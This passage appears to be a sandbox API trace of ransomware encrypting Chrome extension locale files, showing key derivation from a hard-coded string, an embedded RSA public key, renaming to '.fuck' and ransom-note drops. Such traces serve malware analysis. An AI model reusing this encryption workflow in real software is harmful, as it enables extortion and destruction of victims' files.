lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.457] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.458] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.458] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e16e20) returned 1 [0254.461] CryptCreateHash (in: hProv=0x2e16e20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.461] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.461] CryptHashData (hHash=0x2e18428, pbData=0x28cb6e8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.461] CryptDeriveKey (in: hProv=0x2e16e20, Algid=0x6610, hBaseData=0x2e18428, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18828) returned 1 [0254.461] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.461] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.461] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16b78) returned 1 [0254.462] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16b78, dwCertEncodingType=0x1, pInfo=0x298ef60*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298ef90*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298ef98*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e186e8) returned 1 [0254.462] CryptEncrypt (in: hKey=0x2e186e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.462] CryptEncrypt (in: hKey=0x2e186e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e16fb8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e16fb8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.462] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e16fb8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e16fb8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.464] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb2, lpOverlapped=0x0) returned 1 [0254.465] CryptEncrypt (in: hKey=0x2e18828, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0254.465] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0254.465] CloseHandle (hObject=0x5d5c) returned 1 [0254.465] CloseHandle (hObject=0x5d60) returned 1 [0254.466] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), bFailIfExists=0) returned 1 [0254.470] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x0) returned 1 [0254.470] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.gsg")) returned 1 [0254.472] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\messages.json.fuck")) returned 1 [0254.473] CryptDestroyHash (hHash=0x2e18428) returned 1 [0254.473] CryptDestroyKey (hKey=0x2e18828) returned 1 [0254.473] CryptReleaseContext (hProv=0x2e16e20, dwFlags=0x0) returned 1 [0254.473] FindNextFileA (in: hFindFile=0x2e18528, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.473] FindClose (in: hFindFile=0x2e18528 | out: hFindFile=0x2e18528) returned 1 [0254.473] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\readme_back_files.htm")) returned 0xffffffff [0254.474] AreFileApisANSI () returned 1 [0254.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e46c0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0254.474] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_GB\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_gb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.475] GetFileType (hFile=0x5d50) returned 0x1 [0254.475] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.476] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.476] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e18428 [0254.477] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.477] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.477] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.477] GetLastError () returned 0x0 [0254.477] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json")) returned 0x20 [0254.477] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x80) returned 1 [0254.478] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.478] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.481] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.481] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e16e20) returned 1 [0254.484] CryptCreateHash (in: hProv=0x2e16e20, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.484] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.484] CryptHashData (hHash=0x2e18828, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.484] CryptDeriveKey (in: hProv=0x2e16e20, Algid=0x6610, hBaseData=0x2e18828, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0254.485] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.485] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.485] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16ea8) returned 1 [0254.485] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16ea8, dwCertEncodingType=0x1, pInfo=0x298e8e0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e910*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e918*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18668) returned 1 [0254.485] CryptEncrypt (in: hKey=0x2e18668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.485] CryptEncrypt (in: hKey=0x2e18668, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e17040*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e17040*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0254.486] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2e17040*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e17040*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0254.487] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x109, lpOverlapped=0x0) returned 1 [0254.489] CryptEncrypt (in: hKey=0x2e18128, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x109, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0254.489] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0254.489] CloseHandle (hObject=0x5d60) returned 1 [0254.489] CloseHandle (hObject=0x5d5c) returned 1 [0254.489] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), bFailIfExists=0) returned 1 [0254.493] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json", dwFileAttributes=0x0) returned 1 [0254.494] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.gsg")) returned 1 [0254.496] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\messages.json.fuck")) returned 1 [0254.497] CryptDestroyHash (hHash=0x2e18828) returned 1 [0254.497] CryptDestroyKey (hKey=0x2e18128) returned 1 [0254.497] CryptReleaseContext (hProv=0x2e16e20, dwFlags=0x0) returned 1 [0254.497] FindNextFileA (in: hFindFile=0x2e18428, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0254.498] FindClose (in: hFindFile=0x2e18428 | out: hFindFile=0x2e18428) returned 1 [0254.498] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\readme_back_files.htm")) returned 0xffffffff [0254.498] AreFileApisANSI () returned 1 [0254.498] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 156 [0254.498] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_US\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\en_us\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0254.499] GetFileType (hFile=0x5d50) returned 0x1 [0254.499] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0254.501] FindNextFileA (in: hFindFile=0x2e182e8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0254.501] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e180a8 [0254.502] FindNextFileA (in: hFindFile=0x2e180a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.502] FindNextFileA (in: hFindFile=0x2e180a8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0254.503] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0254.503] GetLastError () returned 0x0 [0254.503] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json")) returned 0x20 [0254.503] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json", dwFileAttributes=0x80) returned 1 [0254.504] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0254.505] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0254.505] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\es\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0254.506] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e176a0) returned 1 [0254.509] CryptCreateHash (in: hProv=0x2e176a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0254.509] lstrlenA (lpString="zthKOztpbIbcaEcLZlwCTDmazMlQm") returned 29 [0254.509] CryptHashData (hHash=0x2e18768, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0254.509] CryptDeriveKey (in: hProv=0x2e176a0, Algid=0x6610, hBaseData=0x2e18768, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e18128) returned 1 [0254.509] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----n", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0254.509] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0254.509] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e16e20) returned 1 [0254.510] CryptImportPublicKeyInfo (in: hCryptProv=0x2e16e20, dwCertEncodingType=0x1, pInfo=0x298e9b0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x298e9e0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x298e9e8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e18428) returned 1 [0254.510] CryptEncrypt (in: hKey=0x2e18428, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0254.510] CryptEncrypt (in: hKey=0x2e18428, hHash=0x0, 